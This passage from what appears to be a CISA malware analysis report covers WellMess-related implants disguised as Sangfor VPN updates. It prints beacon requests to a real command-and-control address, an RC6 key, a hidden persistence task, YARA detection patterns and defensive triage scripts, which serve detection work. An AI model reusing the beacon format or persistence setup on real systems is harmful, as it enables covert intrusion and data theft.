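Pulling the two observations together (the session key in the "_ga" filename, and Base64 with inserted separators) gives a small triage parser for this beaconing format. The following added example is not part of the CISA report; it carries a constructed request modelled on the second transmission above (same headers and multipart layout, body truncated after the first few encoded words) and returns the session key and the decoded ciphertext. It strips commas and periods as well as spaces because both sample bodies in the report contain them. RC6 decryption itself is out of scope here; the helper names are assumptions.

```python
import base64
import re

# Constructed sample modelled on the report's "x" test transmission (body truncated).
SAMPLE_POST = (
    "POST / HTTP/1.1\r\n"
    "Content-Type: multipart/form-data; boundary=----974767299852498929531610575\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1\r\n"
    "Host: 103.216.221.19\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
    "------974767299852498929531610575\r\n"
    'Content-Disposition: form-data; name="_ga"; filename="7e061a180fa24eb5a318d6eae8797cc2"\r\n'
    "Content-Type: application/octet-stream\r\n"
    "\r\n"
    "eHh4eH h4eHh4eHh4eHh4eHh4eH h4eHh4eH h4eHh4eHhB6e, RwoJe. cqpDFRSyMwBqaG4 INaFZG9zm2\r\n"
    "------974767299852498929531610575--\r\n"
)

# The same pattern YARA string $26 above keys on, plus the 32-hex-digit key value.
DISPOSITION_RE = re.compile(r'form-data; name="_ga"; filename="([0-9a-f]{32})"')


def split_message(raw: str):
    """Return (lower-cased header dict, body) for a raw HTTP request."""
    head, _, body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body


def extract_session_key(body: str):
    """The per-session RC6 key rides in the filename of the _ga form field."""
    match = DISPOSITION_RE.search(body)
    return match.group(1) if match else None


def extract_part_data(body: str, boundary: str) -> str:
    """Return the payload text of the _ga multipart part."""
    for part in body.split("--" + boundary):
        if 'name="_ga"' in part:
            return part.split("\r\n\r\n", 1)[1].rstrip("\r\n-")
    return ""


def decode_wellmess_base64(text: str) -> bytes:
    """Remove the inserted spaces, commas and periods, re-pad, then decode as standard Base64."""
    cleaned = re.sub(r"[\s,.]", "", text)
    cleaned += "=" * (-len(cleaned) % 4)  # samples are cut short, so padding may be missing
    return base64.b64decode(cleaned, validate=True)


def analyse(raw: str) -> dict:
    headers, body = split_message(raw)
    boundary = headers["content-type"].split("boundary=", 1)[1]
    key = extract_session_key(body)
    ciphertext = decode_wellmess_base64(extract_part_data(body, boundary))
    return {"key": key, "ciphertext": ciphertext, "matches_format": key is not None}


if __name__ == "__main__":
    result = analyse(SAMPLE_POST)
    print("session key:", result["key"])
    print("decoded bytes:", len(result["ciphertext"]), result["ciphertext"][:40])
```

On the report's test body the first 32 decoded bytes come back as "x", confirming that the only change from standard Base64 is the inserted separators.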

The malware will attempt to query its remote C2 server every 900000 milliseconds with the POST request containing encrypted information about the victim system, each time querying the server for 260 bytes of data and searching it for the value “200” to ensure the data was received successfully, and the remote C2 server is alive (Figure 1).

If the malware is able to successfully pass and receive data from its C2 server, it will then generate 32-bytes of data and record the data into a file named “\Sangfor\SSL\.SangforUD.sum”.

The malware will then enter a loop in which it attempts to download payloads from its C2 server every 900000 milliseconds. The 32 bytes of data contained within the newly created file ".SangforUD.sum" are included in each of these connections to the malware's C2 server.

It is not known what the C2 server does with this 32-byte value. However, the malware creates the value and writes it to the file "SangforUD.sum" only once, which suggests the 32-byte value is a unique identifier for each compromised VPN server.

Each payload downloaded from the C2 server will be immediately Base64 decoded, RC6 decrypted, executed using CreateProcessW, and then copied to the system as “\Sangfor\SSL\SangforUDC.exe”.

In addition, the malware decrypts the following Extensible Markup Language (XML) data indicating it uses scheduled tasks to attain persistence on a target Windows system. This data is decrypted using the RC6 algorithm with the key: 2B6233EB3E872FF78988F4A8F3F6A3BA.

—Begin Decrypted XML Task Data—
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2019-07-16T06:00:28.6871947</Date>
    <Author>Sangfor Technologies Co.,Ltd</Author>
    <URI>SangforUpade</URI>
  </RegistrationInfo>
  <Triggers>
    <CalendarTrigger>
      <Repetition>
        <Interval>P1D</Interval>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <StartBoundary>2019-07-16T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay>
        <DaysInterval>1</DaysInterval>
      </ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>true</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>
    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>
    <WakeToRun>true</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>7</Priority>
    <RestartOnFailure>
      <Interval>PT1M</Interval>
      <Count>3</Count>
    </RestartOnFailure>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command></Command>
    </Exec>
  </Actions>
—End Decrypted XML Task Data—
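Several settings in the decrypted task definition are worth flagging on their own when triaging exported scheduled tasks: the task is hidden, it has no execution time limit, it wakes the machine to run, its Command element is empty (filled in at registration time), and its URI is a bare name rather than a task-folder path such as \Microsoft\Windows\... . The following added example (not part of the CISA report) applies those checks with the standard library's ElementTree. The sample embeds the report's task definition trimmed to the relevant elements, with a closing </Task> tag and without the UTF-16 declaration so it parses from a string; the benign comparison task and all helper names are constructed assumptions.

```python
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed from the report's decrypted task data (trimmed, closing tag added).
SAMPLE_TASK = """<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Author>Sangfor Technologies Co.,Ltd</Author>
    <URI>SangforUpade</URI>
  </RegistrationInfo>
  <Triggers>
    <CalendarTrigger>
      <Repetition><Interval>P1D</Interval></Repetition>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Settings>
    <Hidden>true</Hidden>
    <WakeToRun>true</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <RestartOnFailure><Interval>PT1M</Interval><Count>3</Count></RestartOnFailure>
  </Settings>
  <Actions Context="Author">
    <Exec><Command></Command></Exec>
  </Actions>
</Task>"""

# Constructed benign task for comparison (fictitious vendor path).
BENIGN_TASK = r"""<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\ExampleVendor\Nightly</URI></RegistrationInfo>
  <Settings><Hidden>false</Hidden><ExecutionTimeLimit>PT1H</ExecutionTimeLimit></Settings>
  <Actions Context="Author">
    <Exec><Command>C:\Program Files\ExampleVendor\nightly.exe</Command></Exec>
  </Actions>
</Task>"""


def triage_task(xml_text: str) -> list:
    """Return human-readable findings for a Task Scheduler XML definition."""
    root = ET.fromstring(xml_text)

    def text(path):
        el = root.find(path, NS)
        return None if el is None else (el.text or "").strip()

    findings = []
    if text("t:Settings/t:Hidden") == "true":
        findings.append("hidden task")
    if text("t:Actions/t:Exec/t:Command") == "":
        findings.append("empty Exec Command")
    if text("t:Settings/t:ExecutionTimeLimit") == "PT0S":
        findings.append("no execution time limit (PT0S)")
    if text("t:Settings/t:WakeToRun") == "true":
        findings.append("WakeToRun enabled")
    uri = text("t:RegistrationInfo/t:URI") or ""
    if uri and not uri.startswith("\\"):
        findings.append(f"URI {uri!r} is not under a task folder path")
    return findings


if __name__ == "__main__":
    for name, xml_text in (("report task", SAMPLE_TASK), ("benign task", BENIGN_TASK)):
        print(name, "->", triage_task(xml_text) or ["no findings"])
```

Any one of these findings appears in legitimate tasks; the combination of hidden, empty Command and a bare URI is what makes this definition stand out.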

Screenshots

Figure 1 - Screenshot of the connection to the C2 server when attempting to download an RC6 encrypted executable payload. Note: the unique identifier is within the "_ga=" field.

Figure 2 - Screenshot of the malware querying the C2 server after conducting the initial connection. The initial connection will pass information stolen from the target system to the C2 server, including a unique hash used as a victim system identifier. After a successful initial connection with the C2, the malware will begin attempting to download RC6 executable payloads.

Figure 3 - Screenshot of the initialization function for the RC6 algorithm contained in the malware.

103.216.221.19

Tags

command-and-control

HTTP Sessions
  • POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----974767299852498929531610575
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1
    Host: 103.216.221.19
    Content-Length: 38886
    Cache-Control: no-cache
Whois

Queried whois.apnic.net with "103.216.221.19"...
% Information related to '103.216.220.0 - 103.216.223.255'
% Abuse contact for '103.216.220.0 - 103.216.223.255' is 'abuse@hostuniversal.com.au'
inetnum:        103.216.220.0 – 103.216.223.255
netname:        HOST-AU
descr:         Host Universal Pty Ltd
country:        AU
org:            ORG-HUPL1-AP
admin-c:        HUPL1-AP
tech-c:         HUPL1-AP
abuse-c:        AH892-AP
status:         ALLOCATED PORTABLE
remarks:        ——————————————————–
remarks:        To report network abuse, please contact mnt-irt
remarks:        For troubleshooting, please contact tech-c and admin-c
remarks:        Report invalid contact via www.apnic.net/invalidcontact
remarks:        ——————————————————–
mnt-by:         APNIC-HM
mnt-lower:     MAINT-HOST-AU
mnt-routes:     MAINT-HOST-AU
mnt-irt:        IRT-HOST-AU
last-modified: 2020-06-10T13:06:06Z
source:         APNIC
irt:            IRT-HOST-AU
address:        Host Universal Pty Ltd, c/o Brentnalls SA, 255 Port Road, Hindmarsh SA 5007, Australia, Hindmarsh So
e-mail:         abuse@hostuniversal.com.au
abuse-mailbox: abuse@hostuniversal.com.au
admin-c:        HUPL1-AP
tech-c:         HUPL1-AP
auth:         # Filtered
remarks:        abuse@hostuniversal.com.au was validated on 2020-06-25
mnt-by:         MAINT-HOST-AU
last-modified: 2020-06-25T16:58:38Z
source:         APNIC
organisation: ORG-HUPL1-AP
org-name:     Host Universal Pty Ltd
country:        AU
address:        Host Universal Pty Ltd
address:        c/o Brentnalls SA
address:        255 Port Road, Hindmarsh SA 5007, Australia
phone:         +61403394019
e-mail:         abuse@hostuniversal.com.au
mnt-ref:        APNIC-HM
mnt-by:         APNIC-HM
last-modified: 2018-03-20T12:57:09Z
source:         APNIC
role:         ABUSE HOSTAU
address:        Host Universal Pty Ltd, c/o Brentnalls SA, 255 Port Road, Hindmarsh SA 5007, Australia, Hindmarsh So
country:        ZZ
phone:         +000000000
e-mail:         abuse@hostuniversal.com.au
admin-c:        HUPL1-AP
tech-c:         HUPL1-AP
nic-hdl:        AH892-AP
remarks:        Generated from irt object IRT-HOST-AU
abuse-mailbox: abuse@hostuniversal.com.au
mnt-by:         APNIC-ABUSE
last-modified: 2020-06-10T13:06:05Z
source:         APNIC
role:         Host Universal Pty Ltd administrator
address:        Host Universal Pty Ltd, c/o Brentnalls SA, 255 Port Road, Hindmarsh SA 5007, Australia, Hindmarsh So
country:        AU
phone:         +61403394019
fax-no:         +61403394019
e-mail:         abuse@hostuniversal.com.au
admin-c:        HUPL1-AP
tech-c:         HUPL1-AP
nic-hdl:        HUPL1-AP
mnt-by:         MAINT-HOST-AU
last-modified: 2016-05-03T06:34:59Z
source:         APNIC
% Information related to '103.216.221.0/24AS136557'
route:         103.216.221.0/24
origin:         AS136557
descr:         Host Universal Pty Ltd
               Host Universal Pty Ltd
               c/o Brentnalls SA
               255 Port Road, Hindmarsh SA 5007, Australia
mnt-by:         MAINT-HOST-AU
last-modified: 2019-12-19T00:21:46Z
source:         APNIC

Relationships
103.216.221.19 Connected_From 65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75
103.216.221.19 Connected_From 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Description

65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75 and 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2 attempt to connect to the IP address.

58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2

Tags

spyware trojan

Details
Name 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Size 428032 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 967fcf185634def5177f74b0f703bdc0
SHA1 152189b62c546d6297a7083778fba62dcec576be
SHA256 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
SHA512 184dba49900a9b7c2c170c857806bff67c2fb51bcfad672f841d8c484e0c4452a3599f237dadbd6b6eb44a5f541dd6282bee4654486f5003111558262a9c357f
ssdeep 6144:AC70wZI2ZhjKOYTvkh+YVSn9bEAMpNZr3qHLAONXGCSxfuMBES:/lZIpQoYVmZERH0LguMWS
Entropy 6.211072
Antivirus
Ahnlab Malware/Win32.Generic
Antiy Trojan/Win32.Wacatac
ESET a variant of Win32/Spy.Agent.PXZ trojan
Ikarus Trojan-Spy.Agent
K7 Spyware ( 0056414e1 )
Microsoft Security Essentials Trojan:Win32/Skeeyah.B!rfn
Quick Heal Trojan.Agentb
TrendMicro TrojanS.F2D90167
TrendMicro House Call TrojanS.F2D90167
YARA Rules
  • rule CISA_10296782_01 : trojan WELLMESS
    {
    meta:
        Author = "CISA Code & Media Analysis"
        Date = "2020-07-06"
        Last_Modified = "20200706_1017"
        Actor = "n/a"
        Category = "Trojan"
        Family = "WellMess"
        Description = "Detects WellMess implant and SangFor Exploit"
        MD5_1 = "4d38ac3319b167f6c8acb16b70297111"
        SHA256_1 = "7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee"
        MD5_2 = "a32e1202257a2945bf0f878c58490af8"
        SHA256_2 = "a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064"
        MD5_3 = "861879f402fe3080ab058c0c88536be4"
        SHA256_3 = "14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2"
        MD5_4 = "2f9f4f2a9d438cdc944f79bdf44a18f8"
        SHA256_4 = "e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09"
        MD5_5 = "ae7a46529a0f74fb83beeb1ab2c68c5c"
        SHA256_5 = "fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950"
        MD5_6 = "f18ced8772e9d1a640b8b4a731dfb6e0"
        SHA256_6 = "953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a"
        MD5_7 = "3a9cdd8a5cbc3ab10ad64c4bb641b41f"
        SHA256_7 = "5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb"
        MD5_8 = "967fcf185634def5177f74b0f703bdc0"
        SHA256_8 = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
        MD5_9 = "c5d5cb99291fa4b2a68b5ea3ff9d9f9a"
        SHA256_9 = "65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75"
        MD5_10 = "01d322dcac438d2bb6bce2bae8d613cb"
        SHA256_10 = "0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494"
        MD5_11 = "8777a9796565effa01b03cf1cea9d24d"
        SHA256_11 = "83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18"
        MD5_12 = "507bb551bd7073f846760d8b357b7aa9"
        SHA256_12 = "47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854"
    strings:
        $0 = "/home/ubuntu/GoProject/src/bot/botlib/chat.go"
        $1 = "/home/ubuntu/GoProject/src/bot/botlib.Post"
        $2 = "GoProject/src/bot/botlib.deleteFile"
        $3 = "ubuntu/GoProject/src/bot/botlib.generateRandomString"
        $4 = "GoProject/src/bot/botlib.AES_Decrypt"
        $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }
        $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }
        $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }
        $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }
        $9 = "get_keyRC6"
        $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }
        $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }
        $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }
        $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }
        $14 = "GoProject/src/bot/botlib.wellMess"
        $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }
        $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }
        $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }
        $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }
        $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }
        $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }
        $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }
        $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }
        $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }
        $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61 72 67 3E 2E 2A 3F }
        $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }
        $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }
        $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }
    condition:
       ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14) or ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)
    }
ssdeep Matches

No matches found.

PE Metadata
Compile Date 2019-03-01 10:20:20-05:00
Import Hash daf2da52475fd8981b19ec3c321a983c
Company Name Sangfor Technologies Co.,Ltd
File Description SangforUD
Internal Name SangforUD.exe
Legal Copyright Copyright (C) 2015
Original Filename SangforUD.EXE
Product Name SangforUD application
Product Version 7.6.0.100
PE Sections
MD5 Name Raw Size Entropy
1cd19b3151a670e3d1d2a24953392004 header 1024 3.025361
98e91043bf45d10a621d72a2e3200ed0 .text 232960 6.609761
aa6f1abb810df36035bc35cf27c68d59 .rdata 72704 5.619637
c947f4e73cc3503e16ce6173df639c87 .data 4608 3.792666
1f354d76203061bfdd5a53dae48d5435 .tls 512 0.020393
ec6c94b5135c0c75d0a8b7288b77cbae .rsrc 103936 3.885931
b744db87f1a59d6af2a5a37c0da519d1 .reloc 12288 6.571358
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
58d8e65976… Connected_To 103.216.221.19
Description

This file is a 32-bit Windows executable and is similar in design and structure to the file 65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75. This application is also designed to replace the update binaries served out from Sangfor SSL VPN devices. This malware uses the hard-coded C2 IP address 103.216.221.19 to download additional payloads.

a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064

Tags

trojan

Details
Name a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064
Size 434688 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 a32e1202257a2945bf0f878c58490af8
SHA1 416df2d22338f412571cdaedb40ab33eb38977af
SHA256 a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064
SHA512 92ac91e36fc9a8463b2a7b00e6dba687e86a15484d836cb2c8d399d76cd012b71523a9ddae43d9795e2c14fdb7ccc2137d668f7c691b47a2e266a4bfe48de71a
ssdeep 6144:4t4156qfXqT02bFXCYv123kUo4GECAOcL6xDE4U:oc6qkt5vdU6ECe4U
Entropy 6.203383
Antivirus
Ahnlab Malware/Win32.Generic
Antiy GrayWare/Win32.Uwasson
ESET Win32/Spy.Agent.PXZ trojan
Ikarus Trojan-Spy.Agent
K7 Riskware ( 0040eff71 )
McAfee RDN/Generic.cf
Microsoft Security Essentials Trojan:Win32/Occamy.C
NetGate Trojan.Win32.Malware
VirusBlokAda Trojan.Agentb
YARA Rules
  • rule CISA_10296782_01 : trojan WELLMESS
    {
    meta:
        Author = "CISA Code & Media Analysis"
        Date = "2020-07-06"
        Last_Modified = "20200706_1017"
        Actor = "n/a"
        Category = "Trojan"
        Family = "WellMess"
        Description = "Detects WellMess implant and SangFor Exploit"
        MD5_1 = "4d38ac3319b167f6c8acb16b70297111"
        SHA256_1 = "7c39841ba409bce4c2c35437ecf043f22910984325c70b9530edf15d826147ee"
        MD5_2 = "a32e1202257a2945bf0f878c58490af8"
        SHA256_2 = "a4b790ddffb3d2e6691dcacae08fb0bfa1ae56b6c73d70688b097ffa831af064"
        MD5_3 = "861879f402fe3080ab058c0c88536be4"
        SHA256_3 = "14e9b5e214572cb13ff87727d680633f5ee238259043357c94302654c546cad2"
        MD5_4 = "2f9f4f2a9d438cdc944f79bdf44a18f8"
        SHA256_4 = "e329607379a01483fc914a47c0062d5a3a8d8d65f777fbad2c5a841a90a0af09"
        MD5_5 = "ae7a46529a0f74fb83beeb1ab2c68c5c"
        SHA256_5 = "fd3969d32398bbe3709e9da5f8326935dde664bbc36753bd41a0b111712c0950"
        MD5_6 = "f18ced8772e9d1a640b8b4a731dfb6e0"
        SHA256_6 = "953b5fc9977e2d50f3f72c6ce85e89428937117830c0ed67d468e2d93aa7ec9a"
        MD5_7 = "3a9cdd8a5cbc3ab10ad64c4bb641b41f"
        SHA256_7 = "5ca4a9f6553fea64ad2c724bf71d0fac2b372f9e7ce2200814c98aac647172fb"
        MD5_8 = "967fcf185634def5177f74b0f703bdc0"
        SHA256_8 = "58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2"
        MD5_9 = "c5d5cb99291fa4b2a68b5ea3ff9d9f9a"
        SHA256_9 = "65495d173e305625696051944a36a031ea94bb3a4f13034d8be740982bc4ab75"
        MD5_10 = "01d322dcac438d2bb6bce2bae8d613cb"
        SHA256_10 = "0c5ad1e8fe43583e279201cdb1046aea742bae59685e6da24e963a41df987494"
        MD5_11 = "8777a9796565effa01b03cf1cea9d24d"
        SHA256_11 = "83014ab5b3f63b0253cdab6d715f5988ac9014570fa4ab2b267c7cf9ba237d18"
        MD5_12 = "507bb551bd7073f846760d8b357b7aa9"
        SHA256_12 = "47cdb87c27c4e30ea3e2de620bed380d5aed591bc50c49b55fd43e106f294854"
    strings:
        $0 = "/home/ubuntu/GoProject/src/bot/botlib/chat.go"
        $1 = "/home/ubuntu/GoProject/src/bot/botlib.Post"
        $2 = "GoProject/src/bot/botlib.deleteFile"
        $3 = "ubuntu/GoProject/src/bot/botlib.generateRandomString"
        $4 = "GoProject/src/bot/botlib.AES_Decrypt"
        $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }
        $6 = { 3C 00 6E 00 77 00 3E 00 2E 00 2A 00 29 00 00 0B 24 00 7B 00 66 00 6E 00 7D }
        $7 = { 7B 00 61 00 72 00 67 00 7D 00 00 0B 24 00 7B 00 6E 00 77 00 7D }
        $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }
        $9 = "get_keyRC6"
        $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }
        $11 = { 47 C2 2F 35 93 41 2F 55 73 0B C2 60 AB E1 2B 42 }
        $12 = { 53 58 9B 17 1F 45 BD 72 EC 01 30 6C 4F CA 93 1D }
        $13 = { 48 81 21 81 5F 53 3A 64 E0 ED FF 21 23 E5 00 12 }
        $14 = "GoProject/src/bot/botlib.wellMess"
        $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }
        $16 = { 62 6F 74 6C 69 62 2E 45 78 65 63 }
        $17 = { 62 6F 74 6C 69 62 2E 47 65 74 52 61 6E 64 6F 6D 42 79 74 65 73 }
        $18 = { 62 6F 74 6C 69 62 2E 4B 65 79 }
        $19 = { 7F 16 21 9D 7B 03 CB D9 17 3B 9F 27 B3 DC 88 0F }
        $20 = { D9 BD 0A 0E 90 10 B1 39 D0 C8 56 58 69 74 15 8B }
        $21 = { 44 00 59 00 4A 00 20 00 36 00 47 00 73 00 62 00 59 00 31 00 2E }
        $22 = { 6E 00 20 00 46 00 75 00 7A 00 2C 00 4B 00 5A 00 20 00 33 00 31 00 69 00 6A 00 75 }
        $23 = { 43 00 31 00 69 00 76 00 66 00 39 00 32 00 20 00 56 00 37 00 6C 00 4F 00 48 }
        $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61 72 67 3E 2E 2A 3F }
        $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }
        $26 = { 66 6F 72 6D 2D 64 61 74 61 3B 20 6E 61 6D 65 3D 22 5F 67 61 22 3B 20 66 69 6C 65 6E 61 6D 65 3D }
        $27 = { 40 5B 5E 5C 73 5D 2B 3F 5C 73 28 3F 50 3C 74 61 72 3E 2E 2A 3F 29 5C 73 27 }
    condition:
       ($0 and $1 and $2 and $3 and $4) or ($5 and $6 and $7 and $8 and $9) or ($10 and $11) or ($12 and $13) or ($14) or ($15 and $16 and $17 and $18) or ($19 and $20) or ($21 and $22 and $23) or ($24) or ($25 and $26) or ($27)
    }
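As an added illustration, not part of the CISA report or its rule, the following Python decodes a subset of the hex strings from rule CISA_10296782_01 above so an analyst reviewing or tuning the rule can see what each pattern actually matches: several are UTF-16LE (wide) text with .NET-style terminator/length bytes between two adjacent strings, several are narrow ASCII (Go symbol names and regular expressions), and the 16-byte ones are opaque constants. The wide/narrow classification heuristic, the `|` separator for non-text bytes and the function names are this example's own choices; the hex strings themselves are copied verbatim from the rule on this page.

```python
import re

# A subset of the hex strings from rule CISA_10296782_01 on this page, copied
# verbatim; enough to cover each kind of pattern the rule carries.
RULE_STRINGS = r"""
    $5 = { 53 00 63 00 72 00 69 00 70 00 74 00 00 0F 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 07 2F 00 63 }
    $8 = { 52 61 6E 64 6F 6D 53 74 72 69 6E 67 00 44 65 6C 65 74 65 46 69 6C 65 }
    $10 = { 7D A3 26 77 1D 63 3D 5A 32 B4 6F 1F 55 49 44 25 }
    $15 = { 62 6F 74 6C 69 62 2E 4A 6F 69 6E 44 6E 73 43 68 75 6E 6B 73 }
    $24 = { 66 69 6C 65 4E 61 6D 65 3A 28 3F 50 3C 66 6E 3E 2E 2A 3F 29 5C 73 61 72 67 73 3A 28 3F 50 3C 61 72 67 3E 2E 2A 3F }
    $25 = { 5C 00 2E 00 53 00 61 00 6E 00 67 00 66 00 6F 00 72 00 55 00 44 00 2E 00 73 00 75 00 6D }
"""

# One plain hex-string definition ("$name = { .. }") per line. Wildcards and
# jumps ("??", "[4-6]") are not handled; the rule above uses none.
HEX_LINE = re.compile(r"^\s*(\$\w+)\s*=\s*\{([0-9A-Fa-f\s]+)\}\s*$", re.M)


def parse_hex_strings(rule_text):
    """Return {identifier: bytes} for every plain hex string in rule_text."""
    return {name: bytes.fromhex(body) for name, body in HEX_LINE.findall(rule_text)}


def _printable(b):
    return 0x20 <= b < 0x7F


def decode_wide(data):
    """Render UTF-16LE text. Byte pairs that are not text (the .NET #US heap
    terminator/length bytes such as 00 0F sitting between two strings) become
    '|', so the boundary between the strings a pattern spans stays visible.
    A trailing lone byte is kept: several patterns are cut mid-character."""
    out = []
    for i in range(0, len(data), 2):
        pair = data[i:i + 2]
        if len(pair) == 2 and pair[1] == 0 and _printable(pair[0]):
            out.append(chr(pair[0]))
        elif len(pair) == 1 and _printable(pair[0]):
            out.append(chr(pair[0]))
        else:
            out.append("|")
    return "".join(out)


def classify(data):
    """Heuristic of this example (YARA records no such thing): 'utf-16le' if
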